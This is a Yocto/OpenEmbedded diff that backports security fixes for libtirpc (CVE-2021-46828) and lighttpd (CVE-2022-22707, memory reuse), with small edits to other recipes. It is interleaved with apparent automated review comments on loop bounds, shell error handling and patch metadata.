diff --git a/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
new file mode 100644
index 0000000000..c78e7ef4d5
--- /dev/null
+++ b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
@@ -0,0 +1,155 @@
+From 48309e7cb230fc539c3edab0b3363f8ce973194f Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 28 Jul 2022 09:11:04 +0530
+Subject: [PATCH] CVE-2021-46828
+
+Upstream-Status: Backport [http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed}
+CVE: CVE-2021-46828
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/svc.c | 17 +++++++++++++-
+ src/svc_vc.c | 62 +++++++++++++++++++++++++++++++++++++++++++++++++++-
+ 2 files changed, 77 insertions(+), 2 deletions(-)
+
+diff --git a/src/svc.c b/src/svc.c
+index 6db164b..3a8709f 100644
+--- a/src/svc.c
++++ b/src/svc.c
+@@ -57,7 +57,7 @@
+
+ #define max(a, b) (a > b ? a : b)
+
+-static SVCXPRT **__svc_xports;
++SVCXPRT **__svc_xports;
+ int __svc_maxrec;
+
+ /*
+@@ -194,6 +194,21 @@ __xprt_do_unregister (xprt, dolock)
+ rwlock_unlock (&svc_fd_lock);
+ }
+
++int
++svc_open_fds()
++{
++ int ix;
++ int nfds = 0;
++
++ rwlock_rdlock (&svc_fd_lock);
++ for (ix = 0; ix < svc_max_pollfd; ++ix) {
++ if (svc_pollfd[ix].fd != -1)
++ nfds++;
++ }
++ rwlock_unlock (&svc_fd_lock);
++ return (nfds);
++}
++
+ /*
+ * Add a service program to the callout list.
+ * The dispatch routine will be called when a rpc request for this
+diff --git a/src/svc_vc.c b/src/svc_vc.c
+index c23cd36..1729963 100644
+--- a/src/svc_vc.c
++++ b/src/svc_vc.c
+@@ -64,6 +64,8 @@
+
+
+ extern rwlock_t svc_fd_lock;
++extern SVCXPRT **__svc_xports;
++extern int svc_open_fds();
+
+ static SVCXPRT *makefd_xprt(int, u_int, u_int);
+ static bool_t rendezvous_request(SVCXPRT *, struct rpc_msg *);
+@@ -82,6 +84,7 @@ static void svc_vc_ops(SVCXPRT *);
+ static bool_t svc_vc_control(SVCXPRT *xprt, const u_int rq, void *in);
+ static bool_t svc_vc_rendezvous_control (SVCXPRT *xprt, const u_int rq,
+ void *in);
++static int __svc_destroy_idle(int timeout);
+
+ struct cf_rendezvous { /* kept in xprt->xp_p1 for rendezvouser */
+ u_int sendsize;
+@@ -312,13 +315,14 @@ done:
+ return (xprt);
+ }
+
++
+ /*ARGSUSED*/
+ static bool_t
+ rendezvous_request(xprt, msg)
+ SVCXPRT *xprt;
+ struct rpc_msg *msg;
+ {
+- int sock, flags;
++ int sock, flags, nfds, cnt;
+ struct cf_rendezvous *r;
+ struct cf_conn *cd;
+ struct sockaddr_storage addr;
+@@ -378,6 +382,16 @@ again:
+
+ gettimeofday(&cd->last_recv_time, NULL);
+
++ nfds = svc_open_fds();
++ if (nfds >= (_rpc_dtablesize() / 5) * 4) {
++ /* destroy idle connections */
++ cnt = __svc_destroy_idle(15);
++ if (cnt == 0) {
++ /* destroy least active */
++ __svc_destroy_idle(0);
++ }
++ }
++
+ return (FALSE); /* there is never an rpc msg to be processed */
+ }
+
+@@ -819,3 +833,49 @@ __svc_clean_idle(fd_set *fds, int timeout, bool_t cleanblock)
+ {
+ return FALSE;
+ }
++
++static int
++__svc_destroy_idle(int timeout)
++{
++ int i, ncleaned = 0;
++ SVCXPRT *xprt, *least_active;
++ struct timeval tv, tdiff, tmax;
++ struct cf_conn *cd;
++
++ gettimeofday(&tv, NULL);
++ tmax.tv_sec = tmax.tv_usec = 0;
++ least_active = NULL;
++ rwlock_wrlock(&svc_fd_lock);
++
++ for (i = 0; i <= svc_max_pollfd; i++) {
++ if (svc_pollfd[i].fd == -1)
++ continue;
++ xprt = __svc_xports[i];
++ if (xprt == NULL || xprt->xp_ops == NULL ||
++ xprt->xp_ops->xp_recv != svc_vc_recv)
++ continue;
++ cd = (struct cf_conn *)xprt->xp_p1;
++ if (!cd->nonblock)
++ continue;
++ if (timeout == 0) {
++ timersub(&tv, &cd->last_recv_time, &tdiff);
++ if (timercmp(&tdiff, &tmax, >)) {
++ tmax = tdiff;
++ least_active = xprt;
++ }
++ continue;
++ }
++ if (tv.tv_sec - cd->last_recv_time.tv_sec > timeout) {
++ __xprt_unregister_unlocked(xprt);
++ __svc_vc_dodestroy(xprt);
++ ncleaned++;
++ }
++ }
++ if (timeout == 0 && least_active != NULL) {
++ __xprt_unregister_unlocked(least_active);
++ __svc_vc_dodestroy(least_active);
++ ncleaned++;
++ }
++ rwlock_unlock(&svc_fd_lock);
++ return (ncleaned);
++}
+--
+2.25.1
+
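Review bot: The two loops over svc_pollfd added by this patch disagree on the upper bound. svc_open_fds() in src/svc.c stops at `ix < svc_max_pollfd`, while __svc_destroy_idle() in src/svc_vc.c runs to `i <= svc_max_pollfd`. If svc_max_pollfd is an entry count (its definition is outside the patch), the second loop reads svc_pollfd[] and __svc_xports[] one element past the end while holding the write lock. I would change it to `for (i = 0; i < svc_max_pollfd; i++) {` or add a comment saying why the inclusive bound is correct. That loop also indexes __svc_xports[] with the poll-slot index `i`, which is only valid if both arrays share indexing, and `cd` is dereferenced without a NULL check. Separately, the Upstream-Status tag in the header closes its bracket with `}` instead of `]`.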
diff --git a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
index 10a324c3b6..80151ff83a 100644
--- a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
+++ b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
@@ -9,7 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f835cce8852481e4b2bbbdd23b5e47f3 \
PROVIDES = "virtual/librpc"
-SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2"
+SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2 \
+ file://CVE-2021-46828.patch \
+ "
UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/"
UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/"
SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb"
@@ -20,7 +22,7 @@ inherit autotools pkgconfig
EXTRA_OECONF = "--disable-gssapi"
do_install_append() {
- chown root:root ${D}${sysconfdir}/netconfig
+ test -e ${D}${sysconfdir}/netconfig && chown root:root ${D}${sysconfdir}/netconfig
}
BBCLASSEXTEND = "native nativesdk"
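Review bot: `test -e FILE && chown ...` is the last command in do_install_append, so when the file is absent the list returns non-zero and the function returns non-zero with it. As far as I know BitBake runs shell tasks with errexit, so the task would fail in exactly the case this guard is meant to tolerate. An explicit conditional avoids that: `if [ -e ${D}${sysconfdir}/netconfig ]; then chown root:root ${D}${sysconfdir}/netconfig; fi`.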
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
index f17bdce2c0..44b9136b05 100644
--- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
@@ -1,4 +1,4 @@
-From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001
+From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001
From: Alexander Kanavin <alex.kanavin@gmail.com>
Date: Fri, 26 Aug 2016 18:20:32 +0300
Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
@@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
RP 2014/5/22
Upstream-Status: Pending
Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+
---
configure.ac | 16 ++++++++++++----
1 file changed, 12 insertions(+), 4 deletions(-)
diff --git a/configure.ac b/configure.ac
-index 5383cec..c29a902 100644
+index dbddfb9..62cf17f 100644
--- a/configure.ac
+++ b/configure.ac
-@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre],
+@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre],
)
AC_MSG_RESULT([$WITH_PCRE])
@@ -37,6 +38,3 @@ index 5383cec..c29a902 100644
else
AC_PATH_PROG([PCRECONFIG], [pcre-config])
if test -n "$PCRECONFIG"; then
---
-2.15.0
-
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
new file mode 100644
index 0000000000..e226366112
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
@@ -0,0 +1,224 @@
+From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Wed, 23 Dec 2020 23:14:47 -0500
+Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033)
+
+(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337)
+
+(thx flynn)
+
+fix large memory usage for large file downloads from dynamic backends
+
+reuse or release large memory chunks
+
+x-ref:
+ "Memory Growth with PUT and full buffered streams"
+ https://redmine.lighttpd.net/issues/3033
+
+Upstream-Status: Backport
+Comment: Hunk refreshed to make it backword compatible.
+https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+
+---
+ src/chunk.c | 99 +++++++++++++++++++++++++++++++++---------
+ src/chunk.h | 2 +
+ src/http-header-glue.c | 2 +-
+ 3 files changed, 82 insertions(+), 21 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 133308f..d7259b9 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -28,16 +28,20 @@
+ static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
++static int chunks_oversized_n;
+ static array *chunkqueue_default_tempdirs = NULL;
+ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
++ size_t x = 1024;
++ while (x < sz && x < (1u << 30)) x <<= 1;
++ chunk_buf_sz = sz > 0 ? x : 8192;
+ }
+
+ void chunkqueue_set_tempdirs_default_reset (void)
+ {
++ chunk_buf_sz = 8192;
+ chunkqueue_default_tempdirs = NULL;
+ chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+ }
+@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) {
+ free(c);
+ }
+
+-buffer * chunk_buffer_acquire(void) {
++static chunk * chunk_pop_oversized(size_t sz) {
++ /* future: might have buckets of certain sizes, up to socket buf sizes */
++ if (chunks_oversized && chunks_oversized->mem->size >= sz) {
++ --chunks_oversized_n;
++ chunk *c = chunks_oversized;
++ chunks_oversized = c->next;
++ return c;
++ }
++ return NULL;
++}
++
++static void chunk_push_oversized(chunk * const c, const size_t sz) {
++ if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) {
++ ++chunks_oversized_n;
++ chunk **co = &chunks_oversized;
++ while (*co && sz < (*co)->mem->size) co = &(*co)->next;
++ c->next = *co;
++ *co = c;
++ }
++ else
++ chunk_free(c);
++}
++
++static buffer * chunk_buffer_acquire_sz(size_t sz) {
+ chunk *c;
+ buffer *b;
+- if (chunks) {
+- c = chunks;
+- chunks = c->next;
++ if (sz <= chunk_buf_sz) {
++ if (chunks) {
++ c = chunks;
++ chunks = c->next;
++ }
++ else
++ c = chunk_init(chunk_buf_sz);
++ /* future: might choose to pop from chunks_oversized, if available
++ * (even if larger than sz) rather than allocating new chunk
++ * (and if doing so, might replace chunks_oversized_n) */
+ }
+ else {
+- c = chunk_init(chunk_buf_sz);
++ /*(round up to nearest chunk_buf_sz)*/
++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++ c = chunk_pop_oversized(sz);
++ if (NULL == c)
++ c = chunk_init(sz);
+ }
+ c->next = chunk_buffers;
+ chunk_buffers = c;
+@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) {
+ return b;
+ }
+
++buffer * chunk_buffer_acquire(void) {
++ return chunk_buffer_acquire_sz(chunk_buf_sz);
++}
++
+ void chunk_buffer_release(buffer *b) {
+ if (NULL == b) return;
+- if (b->size >= chunk_buf_sz && chunk_buffers) {
++ if (chunk_buffers) {
+ chunk *c = chunk_buffers;
+ chunk_buffers = c->next;
+ c->mem = b;
+- c->next = chunks;
+- chunks = c;
+ buffer_clear(b);
++ if (b->size == chunk_buf_sz) {
++ c->next = chunks;
++ chunks = c;
++ }
++ else if (b->size > chunk_buf_sz)
++ chunk_push_oversized(c, b->size);
++ else
++ chunk_free(c);
+ }
+ else {
+ buffer_free(b);
+ }
+ }
+
++size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) {
++ if (sz > chunk_buffer_string_space(b)) {
++ sz += b->used ? b->used : 1;
++ buffer * const cb = chunk_buffer_acquire_sz(sz);
++ /* swap buffer contents and copy original b->ptr into larger b->ptr */
++ /*(this does more than buffer_move())*/
++ buffer tb = *b;
++ *b = *cb;
++ *cb = tb;
++ if ((b->used = tb.used))
++ memcpy(b->ptr, tb.ptr, tb.used);
++ chunk_buffer_release(cb);
++ }
++ return chunk_buffer_string_space(b);
++}
++
+ static chunk * chunk_acquire(size_t sz) {
+ if (sz <= chunk_buf_sz) {
+ if (chunks) {
+@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) {
+ sz = chunk_buf_sz;
+ }
+ else {
+- sz = (sz + 8191) & ~8191uL;
+- /* future: might have buckets of certain sizes, up to socket buf sizes*/
+- if (chunks_oversized && chunks_oversized->mem->size >= sz) {
+- chunk *c = chunks_oversized;
+- chunks_oversized = c->next;
+- return c;
+- }
++ /*(round up to nearest chunk_buf_sz)*/
++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++ chunk *c = chunk_pop_oversized(sz);
++ if (c) return c;
+ }
+
+ return chunk_init(sz);
+@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) {
+ }
+ else if (sz > chunk_buf_sz) {
+ chunk_reset(c);
+- chunk **co = &chunks_oversized;
+- while (*co && sz < (*co)->mem->size) co = &(*co)->next;
+- c->next = *co;
+- *co = c;
++ chunk_push_oversized(c, sz);
+ }
+ else {
+ chunk_free(c);
+@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void)
+ chunk_free(c);
+ }
+ chunks_oversized = NULL;
++ chunks_oversized_n = 0;
+ }
+
+ void chunkqueue_chunk_pool_free(void)
+diff --git a/src/chunk.h b/src/chunk.h
+index 4c6b7e4..93f343c 100644
+--- a/src/chunk.h
++++ b/src/chunk.h
+@@ -50,6 +50,8 @@ typedef struct {
+ buffer * chunk_buffer_acquire(void);
+ void chunk_buffer_release(buffer *b);
+
++size_t chunk_buffer_prepare_append (buffer *b, size_t sz);
++
+ void chunkqueue_chunk_pool_clear(void);
+ void chunkqueue_chunk_pool_free(void);
+
+diff --git a/src/http-header-glue.c b/src/http-header-glue.c
+index d54f00c..2231fba 100644
+--- a/src/http-header-glue.c
++++ b/src/http-header-glue.c
+@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o
+ if (avail < toread) {
+ /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/
+ avail = avail ? avail - 1 + toread : toread;
+- buffer_string_prepare_append(b, avail);
++ avail = chunk_buffer_prepare_append(b, avail);
+ }
+
+ n = read(fd, b->ptr+buffer_string_length(b), avail);
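Review bot: The round-up `sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);` in chunk_buffer_acquire_sz() and chunk_acquire() is only correct while chunk_buf_sz is a power of two. The patch establishes that by rewriting chunkqueue_set_chunk_size(), but nothing says so where the mask is used. I would add `/* chunk_buf_sz is always a power of 2; see chunkqueue_set_chunk_size() */` above both round-ups. The addition there, and `sz += b->used ? b->used : 1;` in chunk_buffer_prepare_append(), are unchecked size_t arithmetic. The only visible caller passes a value derived from `toread`, and whether that is bounded is outside the hunk, so it is worth confirming. The `64` cap in chunk_push_oversized() would also benefit from a one-line comment on what it limits.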
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
new file mode 100644
index 0000000000..da59b7297a
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
@@ -0,0 +1,100 @@
+From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001
+From: povcfe <povcfe@qq.com>
+Date: Wed, 5 Jan 2022 11:11:09 +0000
+Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134)
+
+(thx povcfe)
+
+(edited: gstrauss)
+
+There is a potential remote denial of service in lighttpd mod_extforward
+under specific, non-default and uncommon 32-bit lighttpd mod_extforward
+configurations.
+
+Under specific, non-default and uncommon lighttpd mod_extforward
+configurations, a remote attacker can trigger a 4-byte out-of-bounds
+write of value '-1' to the stack. This is not believed to be exploitable
+in any way beyond triggering a crash of the lighttpd server on systems
+where the lighttpd server has been built 32-bit and with compiler flags
+which enable a stack canary -- gcc/clang -fstack-protector-strong or
+-fstack-protector-all, but bug not visible with only -fstack-protector.
+
+With standard lighttpd builds using -O2 optimization on 64-bit x86_64,
+this bug has not been observed to cause adverse behavior, even with
+gcc/clang -fstack-protector-strong.
+
+For the bug to be reachable, the user must be using a non-default
+lighttpd configuration which enables mod_extforward and configures
+mod_extforward to accept and parse the "Forwarded" header from a trusted
+proxy. At this time, support for RFC7239 Forwarded is not common in CDN
+providers or popular web server reverse proxies. It bears repeating that
+for the user to desire to configure lighttpd mod_extforward to accept
+"Forwarded", the user must also be using a trusted proxy (in front of
+lighttpd) which understands and actively modifies the "Forwarded" header
+sent to lighttpd.
+
+lighttpd natively supports RFC7239 "Forwarded"
+hiawatha natively supports RFC7239 "Forwarded"
+
+nginx can be manually configured to add a "Forwarded" header
+https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/
+
+A 64-bit build of lighttpd on x86_64 (not known to be affected by bug)
+in front of another 32-bit lighttpd will detect and reject a malicious
+"Forwarded" request header, thereby thwarting an attempt to trigger
+this bug in an upstream 32-bit lighttpd.
+
+The following servers currently do not natively support RFC7239 Forwarded:
+nginx
+apache2
+caddy
+node.js
+haproxy
+squid
+varnish-cache
+litespeed
+
+Given the general dearth of support for RFC7239 Forwarded in popular
+CDNs and web server reverse proxies, and given the prerequisites in
+lighttpd mod_extforward needed to reach this bug, the number of lighttpd
+servers vulnerable to this bug is estimated to be vanishingly small.
+Large systems using reverse proxies are likely running 64-bit lighttpd,
+which is not known to be adversely affected by this bug.
+
+In the future, it is desirable for more servers to implement RFC7239
+Forwarded. lighttpd developers would like to thank povcfe for reporting
+this bug so that it can be fixed before more CDNs and web servers
+implement RFC7239 Forwarded.
+
+x-ref:
+ "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1"
+ https://redmine.lighttpd.net/issues/3134
+ (not yet written or published)
+ CVE-2022-22707
+
+Upstream-Status: Backport
+CVE: CVE-2022-22707
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+---
+ src/mod_extforward.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mod_extforward.c b/src/mod_extforward.c
+index ba957e04..fdaef7f6 100644
+--- a/src/mod_extforward.c
++++ b/src/mod_extforward.c
+@@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c
+ while (s[i] == ' ' || s[i] == '\t') ++i;
+ if (s[i] == ';') { ++i; continue; }
+ if (s[i] == ',') {
+- if (j >= (int)(sizeof(offsets)/sizeof(int))) break;
++ if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break;
+ offsets[++j] = -1; /*("offset" separating params from next proxy)*/
+ ++i;
+ continue;
+--
+2.25.1
+
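Review bot: The `Upstream-Status: Backport` tag in this patch header carries no upstream commit reference, unlike the libarchive and libsolv backports in the same commit. That makes a security fix harder to audit against upstream. It should read `Upstream-Status: Backport [<upstream commit URL>]`. The hunk header names `request_st * const r`, while the http-header-glue.c hunk elsewhere in this commit shows the 1.4.55 tree still using `server *srv, connection *con`. The patch was therefore probably taken from a newer tree and applies by offset, so it is worth refreshing and confirming it lands on the intended `offsets[++j] = -1;` site.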
diff --git a/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
new file mode 100644
index 0000000000..fd75ca6e26
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
@@ -0,0 +1,35 @@
+From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Fri, 29 Nov 2019 18:18:52 -0500
+Subject: [PATCH] default chunk size 8k (was 4k)
+
+Upstream-Status: Backport
+Comment: No hunk refreshed
+https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/chunk.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 09dd3f1..133308f 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -25,7 +25,7 @@
+ #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024)
+ #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024)
+
+-static size_t chunk_buf_sz = 4096;
++static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
+ static array *chunkqueue_default_tempdirs = NULL;
+@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096;
++ chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
+ }
+
+ void chunkqueue_set_tempdirs_default_reset (void)
diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
index 7a255ce2f2..357a269015 100644
--- a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
+++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
@@ -1,5 +1,6 @@
SUMMARY = "Lightweight high-performance web server"
HOMEPAGE = "http://www.lighttpd.net/"
+DESCRIPTION = "Lightweight high-performance web server is designed and optimized for high performance environments. With a small memory footprint compared to other web-servers, effective management of the cpu-load, and advanced feature set (FastCGI, SCGI, Auth, Output-Compression, URL-Rewriting and many more)"
BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues"
LICENSE = "BSD-3-Clause"
@@ -13,10 +14,13 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \
lighttpd-module-accesslog"
SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \
+ file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \
file://index.html.lighttpd \
file://lighttpd.conf \
file://lighttpd \
file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \
+ file://default-chunk-size-8k.patch \
+ file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \
"
SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03"
diff --git a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
index 17f4bf4617..7c1b77add8 100644
--- a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
+++ b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
@@ -1,6 +1,7 @@
SUMMARY = "Rotates, compresses, removes and mails system log files"
SECTION = "console/utils"
-HOMEPAGE = "https://github.com/logrotate/logrotate/issues"
+HOMEPAGE = "https://github.com/logrotate/logrotate/"
+DESCRIPTION = "The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files."
LICENSE = "GPLv2"
# TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox?
@@ -21,6 +22,9 @@ SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/${PV}/${BP}.tar.xz
SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb"
SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b"
+# These CVEs are debian, gentoo or SUSE specific on the way logrotate was installed/used
+CVE_CHECK_WHITELIST += "CVE-2011-1548 CVE-2011-1549 CVE-2011-1550"
+
PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}"
PACKAGECONFIG[acl] = ",,acl"
diff --git a/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
new file mode 100644
index 0000000000..f32cd18370
--- /dev/null
+++ b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
@@ -0,0 +1,27 @@
+lsb-release maintains it's own copy of help2man. Include the support
+for specifying SOURCE_DATE_EPOCH from upstream.
+
+Upstream-Status: Pending
+
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+
+diff --git a/help2man b/help2man
+index 13015c2..63439db 100755
+--- a/help2man
++++ b/help2man
+@@ -173,7 +173,14 @@ my ($help_text, $version_text) = map {
+ or die "$this_program: can't get `--$_' info from $ARGV[0]\n"
+ } qw(help), $opt_version_key;
+
+-my $date = strftime "%B %Y", localtime;
++my $epoch_secs = time;
++if (exists $ENV{SOURCE_DATE_EPOCH} and $ENV{SOURCE_DATE_EPOCH} =~ /^(\d+)$/)
++{
++ $epoch_secs = $1;
++ $ENV{TZ} = 'UTC0';
++}
++
++my $date = strftime "%B %Y", localtime $epoch_secs;
+ (my $program = $ARGV[0]) =~ s!.*/!!;
+ my $package = $program;
+ my $version;
diff --git a/meta/recipes-extended/lsb/lsb-release_1.4.bb b/meta/recipes-extended/lsb/lsb-release_1.4.bb
index 3e8f7a13ec..bafc18fcc0 100644
--- a/meta/recipes-extended/lsb/lsb-release_1.4.bb
+++ b/meta/recipes-extended/lsb/lsb-release_1.4.bb
@@ -11,6 +11,7 @@ LIC_FILES_CHKSUM = "file://README;md5=12da544b1a3a5a1795a21160b49471cf"
SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \
file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \
file://0001-Remove-timestamp-from-manpage.patch \
+ file://help2man-reproducibility.patch \
"
SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4"
diff --git a/meta/recipes-extended/lsof/lsof_4.91.bb b/meta/recipes-extended/lsof/lsof_4.91.bb
index b3adfd57af..7c85bf23fc 100644
--- a/meta/recipes-extended/lsof/lsof_4.91.bb
+++ b/meta/recipes-extended/lsof/lsof_4.91.bb
@@ -3,7 +3,7 @@ DESCRIPTION = "Lsof is a Unix-specific diagnostic tool. \
Its name stands for LiSt Open Files, and it does just that."
HOMEPAGE = "http://people.freebsd.org/~abe/"
SECTION = "devel"
-LICENSE = "BSD"
+LICENSE = "Spencer-94"
LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a"
# Upstream lsof releases are hosted on an ftp server which times out download
diff --git a/meta/recipes-extended/ltp/ltp_20200120.bb b/meta/recipes-extended/ltp/ltp_20200120.bb
index 6633755a20..505b7b14fc 100644
--- a/meta/recipes-extended/ltp/ltp_20200120.bb
+++ b/meta/recipes-extended/ltp/ltp_20200120.bb
@@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__"
CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__"
SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5"
-SRC_URI = "git://github.com/linux-test-project/ltp.git \
+SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \
file://0001-build-Add-option-to-select-libc-implementation.patch \
file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \
file://0004-guard-mallocopt-with-__GLIBC__.patch \
